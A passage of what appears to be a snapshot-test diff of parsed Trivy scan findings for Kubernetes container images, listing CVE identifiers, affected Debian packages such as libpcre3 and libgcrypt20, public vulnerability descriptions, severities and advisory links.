"http://www.openwall.com/lists/oss-security/2017/11/01/3", - "http://www.openwall.com/lists/oss-security/2017/11/01/7", - "http://www.openwall.com/lists/oss-security/2017/11/01/8", - "http://www.securityfocus.com/bid/101688", - "https://access.redhat.com/security/cve/CVE-2017-16231", - "https://bugs.exim.org/show_bug.cgi?id=2047", - "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", - "https://www.cve.org/CVERecord?id=CVE-2017-16231", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** In PCRE 8.41, after compiling, a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c because of a self-recursive call. NOTE: third parties dispute the relevance of this report, noting that there are options that can be used to limit the amount of stack that is used.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "pcre: self-recursive call in match() in pcre_exec.c leads to denial of service", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-16231", + "value": "https://linux.oracle.com/errata/ELSA-2020-1810.html", }, { "type": "URL", - "value": "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2018/Dec/33", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/11", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/3", + "value": "https://security.netapp.com/advisory/ntap-20190606-0002/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/7", + "value": "https://ubuntu.com/security/notices/USN-4004-1", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/8", + "value": "https://ubuntu.com/security/notices/USN-4004-2", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/101688", + "value": "https://ubuntu.com/security/notices/USN-4019-1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-16231", + "value": "https://ubuntu.com/security/notices/USN-4019-2", }, { "type": "URL", - "value": "https://bugs.exim.org/show_bug.cgi?id=2047", + "value": "https://usn.ubuntu.com/4004-1/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", + "value": "https://usn.ubuntu.com/4004-2/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-16231", + "value": "https://usn.ubuntu.com/4019-1/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-7245", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", - "references": [ - "http://www.securityfocus.com/bid/97067", - "https://access.redhat.com/errata/RHSA-2018:2486", - "https://access.redhat.com/security/cve/CVE-2017-7245", - "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", - "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", - "https://security.gentoo.org/glsa/201710-25", - "https://www.cve.org/CVERecord?id=CVE-2017-7245", - ], - }, - "category": "Vulnerability", - "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 4) or possibly have unspecified other impact via a crafted file.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-7245", + "value": "https://usn.ubuntu.com/4019-2/", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/97067", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-8457", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2018:2486", + "value": "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-7245", + "value": "https://www.oracle.com/security-alerts/cpujan2020.html", }, { "type": "URL", - "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "value": "https://www.oracle.com/security-alerts/cpujul2020.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", + "value": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201710-25", + "value": "https://www.sqlite.org/releaselog/3_28_0.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-7245", + "value": "https://www.sqlite.org/src/info/90acdbfce9c08858", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-7246", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-12886", + "installedVersion": "1:8.3.0-6", + "packageName": "libgcc1", "references": [ - "http://www.securityfocus.com/bid/97067", - "https://access.redhat.com/errata/RHSA-2018:2486", - "https://access.redhat.com/security/cve/CVE-2017-7246", - "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", - "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", - "https://security.gentoo.org/glsa/201710-25", - "https://www.cve.org/CVERecord?id=CVE-2017-7246", + "https://access.redhat.com/security/cve/CVE-2018-12886", + "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", + "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", + "https://www.cve.org/CVERecord?id=CVE-2018-12886", + "https://www.gnu.org/software/gcc/gcc-8/changes.html", ], }, "category": "Vulnerability", - "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 268) or possibly have unspecified other impact via a crafted file.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", + "name": "gcc: spilling of stack protection address in cfgexpand.c and function.c leads to stack-overflow protection bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-7246", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/97067", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2018:2486", + "value": "https://avd.aquasec.com/nvd/cve-2018-12886", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-7246", + "value": "https://access.redhat.com/security/cve/CVE-2018-12886", }, { "type": "URL", - "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "value": "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201710-25", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-12886", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-7246", + "value": "https://www.gnu.org/software/gcc/gcc-8/changes.html", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-20838", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-15847", + "installedVersion": "1:8.3.0-6", + "packageName": "libgcc1", "references": [ - "http://seclists.org/fulldisclosure/2020/Dec/32", - "http://seclists.org/fulldisclosure/2021/Feb/14", - "https://access.redhat.com/security/cve/CVE-2019-20838", - "https://bugs.gentoo.org/717920", - "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", - "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", - "https://errata.almalinux.org/8/ALSA-2021-4373.html", - "https://errata.rockylinux.org/RLSA-2021:4373", - "https://linux.oracle.com/cve/CVE-2019-20838.html", - "https://linux.oracle.com/errata/ELSA-2021-4373.html", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", - "https://support.apple.com/kb/HT211931", - "https://support.apple.com/kb/HT212147", - "https://ubuntu.com/security/notices/USN-5425-1", - "https://www.cve.org/CVERecord?id=CVE-2019-20838", - "https://www.pcre.org/original/changelog.txt", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", + "https://access.redhat.com/security/cve/CVE-2019-15847", + "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", + "https://linux.oracle.com/cve/CVE-2019-15847.html", + "https://linux.oracle.com/errata/ELSA-2020-1864.html", + "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + "https://www.cve.org/CVERecord?id=CVE-2019-15847", ], }, "category": "Vulnerability", - "description": "libpcre in PCRE before 8.43 allows a subject buffer over-read in JIT when UTF is disabled, and \\X or \\R has more than one fixed quantifier, a related issue to CVE-2019-20454.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "pcre: Buffer over-read in JIT when UTF is disabled and \\X or \\R has fixed quantifier greater than 1", + "name": "gcc: POWER9 "DARN" RNG intrinsic produces repeated output", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-20838", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2020/Dec/32", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/Feb/14", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-20838", - }, - { - "type": "URL", - "value": "https://bugs.gentoo.org/717920", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", - }, - { - "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", - }, - { - "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4373", + "value": "https://avd.aquasec.com/nvd/cve-2019-15847", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-20838.html", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", + "value": "https://access.redhat.com/security/cve/CVE-2019-15847", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT211931", + "value": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT212147", + "value": "https://linux.oracle.com/cve/CVE-2019-15847.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5425-1", + "value": "https://linux.oracle.com/errata/ELSA-2020-1864.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-20838", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", }, { "type": "URL", - "value": "https://www.pcre.org/original/changelog.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-15847", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36084", - "installedVersion": "3.1-1", - "packageName": "libsepol1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-33560", + "installedVersion": "1.8.4-5", + "packageName": "libgcrypt20", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36084", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", - "https://linux.oracle.com/cve/CVE-2021-36084.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36084", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", + "https://access.redhat.com/security/cve/CVE-2021-33560", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", + "https://dev.gnupg.org/T5305", + "https://dev.gnupg.org/T5328", + "https://dev.gnupg.org/T5466", + "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", + "https://eprint.iacr.org/2021/923", + "https://errata.almalinux.org/8/ALSA-2021-4409.html", + "https://linux.oracle.com/cve/CVE-2021-33560.html", + "https://linux.oracle.com/errata/ELSA-2022-9263.html", + "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", + "https://security.gentoo.org/glsa/202210-13", + "https://ubuntu.com/security/notices/USN-5080-1", + "https://ubuntu.com/security/notices/USN-5080-2", + "https://www.cve.org/CVERecord?id=CVE-2021-33560", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __cil_verify_classpermission and __cil_pre_verify_helper).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "Libgcrypt before 1.8.8 and 1.9.x before 1.9.3 mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm, and the window size is not chosen appropriately. This, for example, affects use of ElGamal in OpenPGP.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libsepol: use-after-free in __cil_verify_classperms()", + "name": "libgcrypt: mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36084", + "value": "https://avd.aquasec.com/nvd/cve-2021-33560", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36084", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", + "value": "https://access.redhat.com/security/cve/CVE-2021-33560", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://dev.gnupg.org/T5305", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://dev.gnupg.org/T5328", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://dev.gnupg.org/T5466", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://eprint.iacr.org/2021/923", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://errata.almalinux.org/8/ALSA-2021-4409.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://linux.oracle.com/cve/CVE-2021-33560.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-9263.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36084.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://security.gentoo.org/glsa/202210-13", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://ubuntu.com/security/notices/USN-5080-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", + "value": "https://ubuntu.com/security/notices/USN-5080-2", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33560", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36084", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36085", - "installedVersion": "3.1-1", - "packageName": "libsepol1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-13627", + "installedVersion": "1.8.4-5", + "packageName": "libgcrypt20", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36085", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", - "https://linux.oracle.com/cve/CVE-2021-36085.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36085", + "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00060.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00018.html", + "http://www.openwall.com/lists/oss-security/2019/10/02/2", + "https://access.redhat.com/security/cve/CVE-2019-13627", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13627", + "https://dev.gnupg.org/T4683", + "https://github.com/gpg/libgcrypt/releases/tag/libgcrypt-1.8.5", + "https://linux.oracle.com/cve/CVE-2019-13627.html", + "https://linux.oracle.com/errata/ELSA-2020-4482.html", + "https://lists.debian.org/debian-lts-announce/2019/09/msg00024.html", + "https://lists.debian.org/debian-lts-announce/2020/01/msg00001.html", + "https://minerva.crocs.fi.muni.cz/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-13627", + "https://security-tracker.debian.org/tracker/CVE-2019-13627", + "https://security.gentoo.org/glsa/202003-32", + "https://ubuntu.com/security/notices/USN-4236-1", + "https://ubuntu.com/security/notices/USN-4236-2", + "https://ubuntu.com/security/notices/USN-4236-3", + "https://usn.ubuntu.com/4236-1/", + "https://usn.ubuntu.com/4236-2/", + "https://usn.ubuntu.com/4236-3/", + "https://www.cve.org/CVERecord?id=CVE-2019-13627", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __verify_map_perm_classperms and hashtab_map).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "It was discovered that there was a ECDSA timing attack in the libgcrypt20 cryptographic library. Version affected: 1.8.4-5, 1.7.6-2+deb9u3, and 1.6.3-2+deb8u4. Versions fixed: 1.8.5-2 and 1.6.3-2+deb8u7.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libsepol: use-after-free in __cil_verify_classperms()", + "name": "libgcrypt: ECDSA timing attack allowing private key leak", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36085", + "value": "https://avd.aquasec.com/nvd/cve-2019-13627", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36085", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00060.html", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00018.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "http://www.openwall.com/lists/oss-security/2019/10/02/2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://access.redhat.com/security/cve/CVE-2019-13627", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13627", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://dev.gnupg.org/T4683", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://github.com/gpg/libgcrypt/releases/tag/libgcrypt-1.8.5", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://linux.oracle.com/cve/CVE-2019-13627.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://linux.oracle.com/errata/ELSA-2020-4482.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://lists.debian.org/debian-lts-announce/2019/09/msg00024.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://lists.debian.org/debian-lts-announce/2020/01/msg00001.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://minerva.crocs.fi.muni.cz/", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-13627", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-13627", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36085.html", + "value": "https://security.gentoo.org/glsa/202003-32", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://ubuntu.com/security/notices/USN-4236-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://ubuntu.com/security/notices/USN-4236-2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", + "value": "https://ubuntu.com/security/notices/USN-4236-3", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://usn.ubuntu.com/4236-1/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36085", + "value": "https://usn.ubuntu.com/4236-2/", + }, + { + "type": "URL", + "value": "https://usn.ubuntu.com/4236-3/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-13627", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36086", - "installedVersion": "3.1-1", - "packageName": "libsepol1", + "fixedVersion": "1.8.4-5+deb10u1", + "foundIn": 